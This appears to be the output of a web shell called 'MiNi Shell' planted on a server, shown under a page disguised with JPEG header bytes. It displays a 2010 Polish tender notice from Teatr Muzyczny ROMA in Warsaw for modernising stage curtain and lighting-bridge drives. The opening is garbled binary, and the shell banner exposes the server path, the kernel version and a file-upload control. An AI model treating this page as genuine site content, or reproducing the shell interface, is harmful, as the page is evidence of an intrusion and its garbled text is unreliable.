JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/81833-N-2010.html

<p class="kh_header"><b>Warszawa: MODERNIZACJA UKŁADÓW NAPĘDOWYCH KURTYN I MOSTÓW ŚWIETLNYCH ORAZ RAMPY ŚWIETLNEJ WRAZ Z NAPĘDEM W TEATRZE MUZYCZNYM ROMA.</b><br>
<b>Numer ogłoszenia: 81833 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA UKŁADÓW NAPĘDOWYCH KURTYN I MOSTÓW ŚWIETLNYCH ORAZ RAMPY ŚWIETLNEJ WRAZ Z NAPĘDEM W TEATRZE MUZYCZNYM ROMA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja istniejących układów napędowych wraz z osprzętem następujących elementów wyposażenia sceny:
1. mostu 1 oświetleniowego nad sceną,  
2. mostu 2 oświetleniowego nad sceną, 
3. kurtyny tiulowej, 
4. kurtyny pełnej czarnej, 
5. rampy oświetleniowej nad sceną,
6. rampy oświetleniowej nad widownią,
7. dwóch sztankietów.

1. Modernizacja napędu mostu 1 oświetleniowego nad sceną obejmuje:
 - dostarczenie nowego zespołu napędowego, demontaż starego zespołu napędowego oraz montaż nowego zespołu napędowego (wciągarki wraz z osprzętem),
 - dostarczenie nowej ramy wraz z osprzętem (koło zdawcze, cierne i mocowania), demontaż starej ramy oraz montaż nowej ramy wraz z osprzętem,
 -  dostarczenie nowych lin nośnych, demontaż starych lin oraz montaż nowych lin,
 - wykonanie systemu sterowania z wykorzystaniem przetwornicy częstotliwości do płynnej   
    regulacji prędkości wraz z odwzorowaniem, demontaż istniejącego sterowania,
 -  dostarczenie i montaż całego osprzętu potrzebnego do mocowania lin, napędu i ramy,
 -  wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami,
 - do zestawu należy dołączyć dodatkową przetwornice w pełni sparametryzowaną i komplet hamulca do napędu.

Parametry techniczne, które ma spełniać most 1 oświetleniowy nad sceną:
 -  olinowanie  1:1,
 -  prędkość jazdy w górę i w dół nie mniejsza niż 0,60 m / sekundę,
 -  wysokość podnoszenia nie mniejsza niż 18 metrów,
 -  udźwig nie mniejszy niż 1250 kg,
 -  ilość punktów mocowania lin do trawersy - 6 punktów,

Informacja dodatkowa:
-  aktualna masa dużego mostu wynosi 750 kg.

2. Modernizacja napędu mostu 2 oświetleniowego nad sceną obejmuje:
 - dostarczenie nowego zespołu napędowego, demontaż starego zespołu napędowego oraz montaż nowego zespołu napędowego (wciągarki wraz z osprzętem ),
 - dostarczenie nowej ramy wraz z osprzętem (koło zdawcze, cierne i mocowania), demontaż starej ramy oraz montaż nowej ramy wraz z osprzętem,
 - dostarczenie nowych lin nośnych, demontaż starych lin oraz montaż nowych lin,
 - wykonanie systemu sterowania z wykorzystaniem przetwornicy częstotliwości do płynnej regulacji prędkości wraz z odwzorowaniem, demontaż istniejącego sterowania,
 - dostarczenie i montaż całego osprzętu potrzebnego do mocowania lin, napędu i ramy,
 - wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami.
 
Parametry techniczne, które ma spełniać most 2 oświetleniowy nad sceną:
 -  olinowanie  1:1,
 -  prędkość jazdy w górę i w dół nie mniejsza niż 0,60 m / sekundę,
 -  wysokość podnoszenia nie mniejsza niż 18 metrów,
 -  udźwig nie mniejszy niż 1250 kg,
 -  ilość punktów mocowania lin do trawersy - 6 punktów, 

Informacja dodatkowa:
-  aktualna masa dużego mostu wynosi 750 kg.

3. Modernizacja kurtyny tiulowej obejmuje:
 - dostarczenie nowego zespołu napędowego, demontaż starego zespołu napędowego oraz montaż nowego zespołu napędowego (wciągarki wraz z osprzętem),
 - dostarczenie nowej ramy wraz z osprzętem (koło zdawcze, cierne i mocowania), demontaż starej ramy oraz montaż nowej ramy wraz z osprzętem,
 -  dostarczenie nowych lin nośnych, demontaż starych lin oraz montaż nowych lin,
 - wykonanie systemu sterowania z wykorzystaniem przetwornicy częstotliwości do    płynnej regulacji prędkości wraz z odwzorowaniem i łączeniem z systemem sterowania kurtyny pełnej czarnej do pracy synchronicznej, demontaż istniejącego sterowania,
 -  dostarczenie i montaż całego osprzętu potrzebnego do mocowania lin, napędu i ramy,
 -  wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami,

Parametry techniczne, które ma spełniać zestaw kurtyny tiulowej:
 - olinowanie 1:1
 - prędkość jazdy w górę i w dół nie mniejsza niż 1 m / sekundę,
 - wysokość podnoszenia nie mniejsza niż 18 metrów,
 - udźwig minimum 500 kg,
 - ilość punktów mocowania lin do trawersy 6 (wymuszona istniejącymi rozwiązaniami 
    technicznymi ).

Informacja dodatkowa:
-  aktualna masa trawersy wynosi 250 kg.

4. Modernizacja kurtyny pełnej czarnej obejmuje:
 - dostarczenie nowego zespołu napędowego, demontaż starego zespołu napędowego oraz montaż nowego zespołu napędowego (wciągarki wraz z osprzętem),
 - dostarczenie nowej ramy wraz z osprzętem (koło zdawcze, cierne i mocowania), demontaż starej ramy oraz montaż nowej ramy wraz z osprzętem,
 -  dostarczenie nowych lin nośnych, demontaż starych lin oraz montaż nowych lin,
 - wykonanie systemu sterowania z wykorzystaniem przetwornicy częstotliwości do płynnej regulacji prędkości wraz z odwzorowaniem i łączeniem z systemem sterowania kurtyny tiulowej do pracy synchronicznej, demontaż istniejącego sterowania,
 - dostarczenie i montaż całego osprzętu potrzebnego do mocowania lin, napędu i ramy,
 - wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami,

Parametry techniczne, które ma spełniać zestaw kurtyny pełnej czarnej:
 -  olinowanie 1:1
 -  prędkość  jazdy w górę i w dół nie mniejsza niż 1 m / sekundę,
 -  wysokość podnoszenia nie mniejsza niż 18 metrów,
 -  udźwig minimum 500 kg,
-  ilość punktów mocowania lin do trawersy 6 ( wymuszona istniejącymi rozwiązaniami 
   technicznymi ),

Informacja dodatkowa:
-  aktualna masa trawersy wynosi 250 kg.




5. Modernizacja rampy oświetleniowej nad sceną obejmuje:
 -  założenie nowego oprzyrządowania rampy świetlnej ( gniazda podłączeniowe obwodów 
    regulowanych ),
 -  dostarczenie nowych lin nośnych, demontaż starych lin i montaż nowych lin.

Sterowanie do wszystkich mostów powinno być wykonane w dwojaki sposób:
 -  pierwszy sposób sterowania polega na wykonaniu pulpitu sterowniczego na poziomie   sceny i w pomieszczeniu inspicjenta sceny,
 -  drugi sposób sterowania polega na dostarczeniu panelu sterowniczego 
    umożliwiającego sterowanie drogą radiową.
Zarówno w pulpicie sterującym znajdującym się na pulpicie inspicjenta jak i w panelu sterującym radiowo powinien posiadać zestaw przycisków do obsługi trzeciego mostu elektrycznego.   
Sterowanie mostów powinno posiadać funkcję jazdy w górę i w dół z płynną prędkością od zera do nominalnej w zależności jak głęboko wychylimy joystik w danym kierunku. 

6. Modernizacja rampy oświetleniowej nad widownią obejmuje:
-   dostarczenie nowego zespołu napędowego, demontaż starego zespołu napędowego 
    oraz montaż nowego zespołu napędowego (wciągarki wraz z osprzętem),
 -  dostarczenie nowej ramy wraz z osprzętem (koło zdawcze, cierne i mocowania), 
    montaż nowej ramy wraz z osprzętem,
 -  wykonanie systemu sterowania, demontaż istniejącego sterowania,
 -  dostarczenie i montaż całego osprzętu potrzebnego do mocowania napędu i ramy,
 -  wykonanie pulpitu sterowniczego, 
 -  sterowanie musi odbywać się z poziomu sceny,  
 -  wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami,

Parametry techniczne, które ma spełniać rampa oświetleniowa nad widownią;
 -  prędkość nie mniejsza niż 7 m / minutę, 
 -  udźwig minimalny do 500 kg,
 -  wysokość podnoszenia nie mniejsza niż 13 metrów
 -  ilość punktów mocowania do trawersy nie mniejsza niż cztery.

7. Modernizacja dwóch sztankietów nad sceną główną z napędu ręcznego na napęd elektryczny obejmuje:
 - demontaż  istniejącego  zespołu napędowego napędu ręcznego,
 - montaż nowego zespołu o napędzie elektrycznym w raz z osprzętem (system sterowania, płynna regulacja prędkości, komplet kół zdawczych, ciernych i opasających),
 - udźwig minimalny 600 kg,
 - wykonanie odpowiedniego systemu odwzorowania,
 - system musi posiadać możliwość jazdy płynnej niezależnie w każdym kierunku,
 - prędkość nie mniejsza niż 1m/sekundę,
 - sterowanie powinno  posiadać możliwość synchronizacji połączenia ze sterowaniem systemu    zapadni,
 - sterowanie musi być realizowane z dwóch poziomów ( poziom sceny i poziom galerii  technicznej,
- wykonanie dokumentacji powykonawczej zgodnie z obowiązującymi przepisami.

W ramach zamówienia Wykonawca zobowiązany jest:
- dostarczyć na własny koszt i ryzyko przedmiot niniejszego zamówienia do siedziby Zamawiającego. Montowane urządzenia, osprzęt oraz akcesoria powinny być fabrycznie nowe i wolne od wad fizycznych i prawnych,
- dokonać przekazania przedmiotu umowy wraz z niezbędnymi dokumentami w siedzibie Zamawiającego na podstawie protokołu odbioru,
- udzielić 36-miesięcznej gwarancji, zapewnić możliwość sprawnego kontaktu z serwisem gwarancyjnym, a w czasie trwania gwarancji dokonywać wszelkich napraw w siedzibie Zamawiającego, a jeżeli zachodzi konieczność dokonania naprawy poza siedzibą Zamawiającego - pokryć koszty transportu z siedziby Zamawiającego do serwisu i z powrotem,
- wykonać wszelkie prace i naprawy w terminach uzgodnionych z  Zamawiającym, tak by nie kolidowały z bieżącą działalnością Teatru,
- przeprowadzić szkolenie pracowników Zamawiającego w zakresie obsługi zamontowanych urządzeń i wyposażenia.

Zamawiający zaleca dokonanie wizji lokalnej w miejscu montażu w/w urządzeń

Wszystkie czynności należy wykonać zgodnie z zasadami wiedzy technicznej, pod nadzorem osób posiadających odpowiednie uprawnienia. 
Wszystkie  prace  powinny  być  wykonane zgodnie z obowiązującymi przepisami prawa, a w szczególności przepisami prawa budowlanego w obiektach budowlanych i Rozporządzeniem Ministra Kultury i Sztuki z dnia 2 września 1982 r. w sprawie bezpieczeństwa i higieny pracy w instytucjach artystycznych (Dz. U. nr 29, poz. 205) oraz Polskimi Normami.

Wykonawca będzie zobowiązany do zachowania najwyższej staranności przy wykonaniu zamówienia, usterki i szkody powstałe w trakcie realizacji zamówienia będą usuwane natychmiast po ich powstaniu przez Wykonawcę na Jego koszt.

Wykonawca będzie zobowiązany do ochrony mienia, przestrzegania przepisów BHP i ppoż., zabezpieczenia pomieszczeń we własnym zakresie, utrzymania porządku w trakcie realizacji prac oraz po ich zakończeniu.

Zamawiający ma prawo do pełnienia nadzoru nad pracami prowadzonymi przez Wykonawcę.

Wykonawca przystępujący do wykonania zamówienia powinien posiadać ważną polisę OC związaną z przedmiotem wykonywanych prac u Zamawiającego obejmującą okres od rozpoczęcia do prac do momentu przekazania przedmiotu umowy Zamawiającemu. 

Wykonawca w ramach zamówienia będzie zobowiązany do zabrania zdemontowanych urządzeń i osprzętu oraz dokonania ich utylizacji. 

Prace będą wykonywane w etapach i odbierane częściowymi protokołami odbioru prac za poszczególne etapy zgodnie z poniższym harmonogramem:
  -  I Etap  -  wykonanie modernizacji rampy oświetleniowej nad widownią,
                 -  wykonanie modernizacji sztankietów o napędzie ręcznym na sztankiety o 
                    napędzie elektrycznym,
  -  II Etap -  wykonanie modernizacji kurtyny tiulowej i kurtyny pełnej czarnej, oraz 
                    rampy oświetleniowej nad sceną,
  -  III Etap - wykonanie modernizacji mostu 1 i mostu 2 oświetleniowego nad sceną, 

Zamawiający dopuszcza płatności częściowe po osiągnięciu wyspecyfikowaniu powyżej etapów. Płatności częściowe przedstawiają się następująco:
- osiągnięcie I etapu - płatność w wysokości 35% wartości umowy,
- osiągnięcie II etapu - płatność w wysokości 25% wartości umowy,
- osiągnięcie III etapu - płatność w wysokości 40% wartości umowy, 

Wykonawca będzie prowadził pracę według harmonogramu ustalonego przez Zamawiającego.

Wykonawca powinien sporządzić dokumentację powykonawczą na całość wykonanych prac oraz zamontowanych urządzeń zgodnie z obowiązującymi przepisami prawa.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.14.14.10-6, 45.22.31.00-7, 44.21.00.00-5, 51.51.11.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; b) posiadania wiedzy i doświadczenia; c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; d) sytuacji ekonomicznej i finansowej. 2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń. Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania. Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. Wykonawcy składają oświadczenia wyłącznie w formie oryginału. 3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz: wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali co najmniej trzy kontrakty na kwotę łączną nie mniejszą niż 150 000 zł brutto, obejmujące modernizację urządzeń i instalacji scenicznych, gdzie sala widowiskowa przeznaczona jest na nie mniej niż 300 osób. 4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa powyżej oraz brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w pkt.III.4.2 niniejszego ogłoszenia 5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa - sekretariat pokój nr 10 parter. Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2010 godzina 13:00, miejsce: Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa - sekretariat pokój nr 10 parter. Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com